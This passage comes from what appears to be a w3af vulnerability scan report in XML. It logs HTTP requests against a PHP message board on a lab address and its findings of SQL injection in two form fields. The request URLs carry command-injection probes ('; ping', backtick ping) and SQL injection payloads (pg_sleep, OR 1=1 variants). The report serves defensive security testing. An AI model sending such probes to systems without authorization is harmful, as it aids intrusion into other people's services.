                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="968">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3Bping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="969">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1+or+pg_sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="464">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/29+AND+29%3D30+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="761">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/12%22+OR+%2212%22%3D%2212 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="984">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27+or+pg_sleep%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="986">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="848">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/3w0EFoHO HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="849">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/12+OR+12%3D12+ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1000">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%22+or+pg_sleep%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1002">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60ping+-n+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="491">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Thread.sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1015">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60ping+-c+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[52]" method="GET" name="Omitted server header" plugin="server_header" severity="Information" url="None" var="None">
        <description>The remote HTTP Server omitted the &quot;server&quot; header in its response.</description>
        <http-transactions>
            <http-transaction id="52">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[80]" method="GET" name="Powered-by header" plugin="server_header" severity="Information" url="None" var="None">
        <description>The x-powered-by header for the target HTTP server is &quot;PHP/5.6.9&quot;.</description>
        <http-transactions>
            <http-transaction id="80">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[655]" method="POST" name="SQL injection" plugin="sqli" severity="High" url="http://10.12.68.43:31337/post" var="pseudo">
        <description>SQL injection in a MySQL database was found at: &quot;http://10.12.68.43:31337/post&quot;, using HTTP method POST. The sent post-data was: &quot;message=Hello%20World&amp;pseudo=a%27b%22c%27d%22&quot; which modifies the &quot;pseudo&quot; parameter.</description>
        <http-transactions>
            <http-transaction id="655">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="45" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz1hJTI3YiUyMmMlMjdkJTIy
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'b&quot;c'd&quot;', 'Hello World')' at line 1
Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[658]" method="POST" name="SQL injection" plugin="sqli" severity="High" url="http://10.12.68.43:31337/post" var="message">
        <description>SQL injection in a MySQL database was found at: &quot;http://10.12.68.43:31337/post&quot;, using HTTP method POST. The sent post-data was: &quot;message=a%27b%22c%27d%22&amp;pseudo=56&quot; which modifies the &quot;message&quot; parameter.</description>
        <http-transactions>
            <http-transaction id="658">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="34" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1hJTI3YiUyMmMlMjdkJTIyJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'b&quot;c'd&quot;')' at line 1
Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[34, 54, 59, 70, 194, 230, 237, 287, 350, 376, 392, 431, 465, 485, 502, 569, 593, 617, 643, 698, 720, 744, 792, 847, 867]" method="GET" name="DAV methods enabled" plugin="allowed_methods" severity="Information" url="http://10.12.68.43:31337/" var="None">
        <description>The URL &quot;http://10.12.68.43:31337/&quot; has the following allowed methods. These include DAV methods and should be disabled: *, CHECKOUT, CONNECT, COPY, GET, HEAD, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, REPORT, SUBSCRIBE, TRACE, UNLOCK, UNSUBSCRIBE.</description>
        <http-transactions>
            <http-transaction id="34">
                <httprequest>
                    <status>OPTIONS http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="54">
                <httprequest>
                    <status>MKCOL http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="59">
                <httprequest>
                    <status>MOVE http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="70">
                <httprequest>
                    <status>HEAD http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
